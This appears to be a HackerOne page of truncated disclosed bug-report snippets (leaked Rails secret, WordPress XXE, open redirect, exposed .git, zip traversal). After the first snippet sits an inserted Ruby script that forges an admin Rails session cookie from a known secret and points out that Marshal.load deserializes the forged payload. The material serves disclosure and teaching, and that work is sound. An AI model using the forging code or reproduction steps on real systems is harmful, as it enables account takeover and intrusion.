HackerOne Reports
Search through disclosed security reports
While doing recon on Algolia, I found that the session secret for facebooksearch.algolia.com has been committed to a **public** GitHub repository. Since the Rails app running at `facebooksearch.algolia.com` is using `CookieStore` as the session storage, this means an attacker knowing the session secret can craft any cookie that will then …
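Why a leaked session secret is decisive for a `CookieStore` app, as an added example that is not part of the report or of Algolia's code: it models the Rails 4.x signed session cookie in plain Ruby (`ActiveSupport::MessageVerifier` over a key derived by `ActiveSupport::KeyGenerator`), forges a session with the secret, and then verifies it the way the server would. The secret, the session contents and the helper names are constructed for illustration; the cookie layout and key derivation parameters are those of Rails 4.x, and Rails 5.2+ encrypts the cookie instead but derives that key from the same secret.

```ruby
require "openssl"
require "base64"

# Added example, not code from the report or from Algolia. It models the
# Rails 4.x CookieStore signed-cookie format (ActiveSupport::MessageVerifier):
#   cookie = base64(Marshal.dump(session)) + "--" + hex(HMAC-SHA1(key, base64))
# with the key derived from secret_key_base by ActiveSupport::KeyGenerator
# (PBKDF2-HMAC-SHA1, salt "signed cookie", 1000 iterations, 64-byte key).
# Rails 5.2+ encrypts the session (AES-256-GCM) instead, but that key is
# derived from the same secret, so a leaked secret is just as fatal there.
# The secret below is a constructed placeholder, not Algolia's.

DEMO_SECRET_KEY_BASE = "0123456789abcdef" * 8 # constructed; 128 hex chars like a real one
SIGNED_COOKIE_SALT   = "signed cookie"
KEY_ITERATIONS       = 1000
KEY_SIZE             = 64

def derive_signing_key(secret_key_base)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, SIGNED_COOKIE_SALT,
                                  KEY_ITERATIONS, KEY_SIZE)
end

def hmac_hex(key, data)
  OpenSSL::HMAC.hexdigest("SHA1", key, data)
end

# Constant-time equality so the verifier does not leak the digest byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Attacker side: with the secret in hand, sign any session hash at all.
def forge_session_cookie(secret_key_base, session)
  encoded = Base64.strict_encode64(Marshal.dump(session))
  "#{encoded}--#{hmac_hex(derive_signing_key(secret_key_base), encoded)}"
end

# Server side: recompute the HMAC and only deserialize when it matches.
# Returns the session hash, or nil when the signature does not check out.
def verify_session_cookie(secret_key_base, cookie)
  encoded, digest = cookie.split("--", 2)
  return nil if encoded.nil? || digest.nil?
  expected = hmac_hex(derive_signing_key(secret_key_base), encoded)
  return nil unless secure_compare(digest, expected)
  # Marshal is the default serializer, so a forged payload reaches Marshal.load.
  Marshal.load(Base64.strict_decode64(encoded))
end

# Three cases: the right secret forges an accepted admin session; a cookie
# whose payload was swapped under another payload's signature is rejected;
# a guessed secret is rejected.
def demo
  admin  = { "session_id" => "constructed", "user_id" => 1, "admin" => true }
  forged = forge_session_cookie(DEMO_SECRET_KEY_BASE, admin)
  other  = forge_session_cookie(DEMO_SECRET_KEY_BASE, { "user_id" => 2 })
  spliced = "#{other.split("--", 2).first}--#{forged.split("--", 2).last}"
  {
    accepted:     verify_session_cookie(DEMO_SECRET_KEY_BASE, forged),
    tampered:     verify_session_cookie(DEMO_SECRET_KEY_BASE, spliced),
    wrong_secret: verify_session_cookie("not-the-real-secret", forged),
  }
end

if $PROGRAM_NAME == __FILE__
  demo.each { |name, result| puts "#{name}: #{result.inspect}" }
end
```

The check a practitioner wants after a leak like this is not whether the signature scheme is sound (it is) but whether the secret has been rotated: every cookie minted under the old `secret_key_base` stays forgeable until it is.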
## Description: The WordPress core Media Library does not securely parse XML content when running on PHP 8. By uploading a malicious .wav file, an authenticated attacker can trigger an XXE vulnerability which allows them to read secret system files, DoS the web server, perform SSRF, or aim at Remote Code …
Ability to bypass Admin override on Cloudflare WARP Android (Severity: High; Bounty: $1,100; State: Closed)
During Apple Pay in-app or on-site payments the device generates a payment cryptogram, which contains a transaction ID, encrypted payment data, etc. This is an example of the cryptogram which the phone passes to the internet acquiring service on api.transferwise.com:
```json
"token": {
  "paymentData": {
    "version": "EC_v1",
    "data": "tJ*",
    "signature": …
```
Steps To Reproduce: ===================== >1_ Visit: [Normal Link](https://iandunn.name/wordpress/wp-login.php?redirect_to=https%3A%2F%2Fiandunn.name%2Fwordpress%2Fwp-admin%2F&reauth=1). >2_ Sign in with your WordPress account and you will be directed to [This](https://iandunn.name/wordpress/wp-admin/). >3_ Change the value of the **Parameter** `redirect_to` to the attacker's website, let's say: (https://vul-example.com). >4_ **NOTE THAT**: you must URL-encode the vulnerable link first. ## Impact …
**Summary:** I found a .git repository on https://███████.mil/.git which discloses an API password for Yubikey on 2 different domains, together with full source code. **Description:** Fetching the git repository and decompressing the objects results in the ability to read the source code of the server, which includes an API password …
I realise this doesn't qualify for a reward, as it's a vulnerability in a third-party app, but as the app is part of the "official" VM image provided by Hansson IT, I think it's well worth fixing. The Extract app doesn't validate the path or filename of a zip file …
Hello Team #Description In the continuous series of 12 days, twelve flags were hidden inside the Hackyholidays site - hackyholidays.h1ctf.com - and once we get all the flags, the Grinch can be stopped. This write-up will describe solving all the 12 days' challenges. #Step To Reproduce + It all started when hackerone …
Able to Take Over Merchants' Accounts Even If They Have Already Set Up SSO, After Bypassing the Email Confirmation ## Summary This report is based on the scenario that email confirmation has been bypassed already, as shown in #791775. What happened in #791775 was, I was too excited and didn't take a step …
Greetings! Hope y'all are good and fine. ## Summary: I would like to report another vulnerability very similar to my other report in #975991. Due to lack of secure design, I was able to find the origin IPs behind the Cloudflare WAF. The IPs I found belong to: 3d.cs.money ## Description: …
I found another code chunk that leads to memory leakage.
```c
exif_process_IFD_in_TIFF(ImageInfo, entry_offset, sub_section_index);
if (section_index!=SECTION_THUMBNAIL && entry_tag==TAG_SUB_IFD) {
    if (ImageInfo->Thumbnail.filetype != IMAGE_FILETYPE_UNKNOWN
        && ImageInfo->Thumbnail.size
        && ImageInfo->Thumbnail.offset
        && ImageInfo->read_thumbnail
    ) {
#ifdef EXIF_DEBUG
        exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_NOTICE, "%s THUMBNAIL @0x%04X + 0x%04X", ImageInfo->Thumbnail.data ? "Ignore" : "Read", ImageInfo->Thumbnail.offset, ImageInfo->Thumbnail.size);
#endif
…
```